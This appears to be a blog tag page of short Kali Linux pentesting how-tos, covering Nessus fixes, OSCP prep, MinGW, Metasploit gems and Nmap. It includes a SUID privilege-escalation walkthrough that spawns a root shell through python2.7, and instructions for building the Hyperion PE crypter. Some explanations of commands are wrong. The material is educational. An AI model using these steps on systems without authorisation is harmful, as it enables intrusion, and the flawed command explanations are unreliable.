Tag: kali linux

Posted on

Nessus has detected that API access on this scanner is disabled.

Nessus displays warning “Nessus has detected that API access on this scanner is disabled” during usage.

To fix this issue, the Nessus service must be stopped, the configuration reset, Nessus restarted and then registered using your previous registration key.

1. Stop the Nessus service:
service nessusd stop

2. Reset the configuration:
/opt/nessus/sbin/nessuscli fix --reset

3. Start the Nessus service:
service nessusd start

4. Register Nessus using your previous registration key:
/opt/nessus/sbin/nessuscli fetch --register xxxx-xxxx-xxxx-xxxx-xxxx

5. Login to Nessus to update plugins.

Posted on

Searching for binaries for privilege escalation exploit

During the attacking phase of a pen test once access has been gained to a shell, we can try to own the system through a privilege escalation exploit in order to obtain root access. We can verify the system identification of the user by using the following command to ascertain SUID permissions:

$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

Then we can use the following command, to find a list of executable file SUID permissions on the system:

find / -perm -u=s -type f 2>/dev/null

Here, the find command will search from root (/) looking for user SUID permissions configured to execute (-perm -u=s), and to find directories (-type f). The result of this search, will be redirected to standard error and use a null device to suppress output (2>/dev/null).

Example show below:

$ find / -perm -u=s 2>/dev/null
/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/python2.7
/usr/bin/chsh
/usr/bin/at
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd
/bin/su
/bin/umount
/bin/mount

Note that if redirect to stdout (>) or (1>) was used instead of stderr (2>), we would see a list of permission denied errors. As given from the above example, we could look to use Python2.7 binary in an attempt to gain root access using a privilege escalation exploit. We can use the following command to achieve this in using our above example:

/usr/bin/python2.7 -c ‘import pty;pty.spawn(“/bin/sh”)’

This command will get a TTY shell after a reverse shell connection using Python2.7. This should result in the system permitting root access, and this can be seen from the following commands:

# id
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
# whoami
root

We can see that the system user now has root access, denoted from the above by euid=0(root) and root identified from whoami command.

Posted on

Fix “Could not validate this preference file” in Nessus

If you receive the below error message when downloading the latest Nessus plugin updates, the following fix may help:

/opt/nessus/sbin/nessuscli update --plugins-only

----- Fetching the newest updates from nessus.org -----

Could not validate this preference file. Have installation files been copied from another system?
Nessus Plugins: Failed

The first step to fix the error, is to request a new activation code from Tenable for the Nessus program: Link.

Then you will need to register your new activation key, received by email and associate to Nessus:
/opt/nessus/sbin/nessuscli fetch --register

Posted on

Alien Vault – How to Prepare to Take the OSCP

Offensive Security Certified Professional (OSCP) – Most recognized penetration testing certification in the industry.

  1. Earn after passing the 24-hour performance based exam
  2. Pre-requisite Course: Penetration Testing with Kali Linux (PWK)
  3. Certification proves you have a clear and practical understanding of the penetration testing process and life-cycle
  4. Virtual network containing targets of varying configurations and operating systems
  5. An OSCP is able to identify vulnerabilities and execute attacks in a controlled and focused manner.

Alien Vault – How to Prepare to Take the OSCP: Link

Posted on

How to install Hyperion in Linux

Hyperion is a runtime encrypter for 32-bit portable executables. It is a reference implementation and bases on the paper “Hyperion: Implementation of a PE-Crypter”.

Hyperion is not included in Kali Linux repositories. To install Hyperion in Linux, run the following commands:

Download the files from Github:
wget https://github.com/nullsecuritynet/tools/raw/master/binary/hyperion/release/Hyperion-1.2.zip

Unzip the archive file:
unzip Hyperion-1.2.zip

Invoke the MingGW compiler to compile Hyperion in to a executable file:
i686-w64-mingw32-c++ Hyperion-1.2/Src/Crypter/*.cpp -o hyperion.exe

Posted on

How to install Ming C compiler in Linux

MinGW, a contraction of “Minimalist GNU for Windows”, is a minimalist development environment for native Microsoft Windows applications.

MinGW provides a complete Open Source programming tool set which is suitable for the development of native MS-Windows applications, and which do not depend on any 3rd-party C-Runtime DLLs. (It does depend on a number of DLLs provided by Microsoft themselves, as components of the operating system; most notable among these is MSVCRT.DLL, the Microsoft C runtime library. Additionally, threaded applications must ship with a freely distributable thread support DLL, provided as part of MinGW itself).

The Ming compiler is included in Kali Linux repositories, but is not installed by default. To install Ming C compiler in Linux, run the following command:

apt-get install mingw-w64

MinGW (mingw-w64) is the successor to mingw32.

Posted on

Kali Linux: Ruby Gem Bundler Errors (Ruby libraries) for Metasploit

An error occurred while installing pcaprub (0.12.4), and Bundler cannot
continue.
Make sure that `gem install pcaprub -v '0.12.4'` succeeds before bundling.

This occurs during the installation process for Bundled Gems in Metasploit and within its local Git repository, e.g.:

cd ~/git/metasploit-framework/
bundle install

Note, ~/git/metasploit-framework/ is my locally defined directory for my Github repository in Kali Linux.

In the top example (see above), the error effects the “pcaprub” Gem. To fix this issue, run the following command:

sudo apt-get install libpcap-dev

This will install the package for libpcap-dev (development library for libpcap) – libpcap-dev Debian package

Once the libpcap-dev package has been installed, the bundle install command can be ran:

cd ~/git/metasploit-framework/
bundle install

Note, for other Gem installation errors during bundle install, it is likely to be an issue with missing packages in your system. The missing packages can be installed via sudo apt-get install [package_name].

Posted on

Adding a new user in Kali Linux

Open a terminal using Ctrl+Alt+T or clicking on the icon – logged in as root

From the console issue the add user command with “-m” to create user home directory – #useradd -m

Create a password for the user – #passwd

Add user to sudo group – #usermod -a -G sudo

Change default shell of user to bash – #chsh -s /bin/bash

Posted on

Initiate SSLv3/TLS Connections with Nmap Script

Locate Nmap scripts folder (location varies by platform – “find / -name ‘*.nse'”

Confirm “ssl-enum-ciphers” exists in folder. Download from Nmap if required – https://nmap.org/nsedoc/scripts/ssl-enum-ciphers.html

Invoke Nmap and run command – “nmap -p 80,443 -T4 –script ssl-enum-ciphers <hostname>.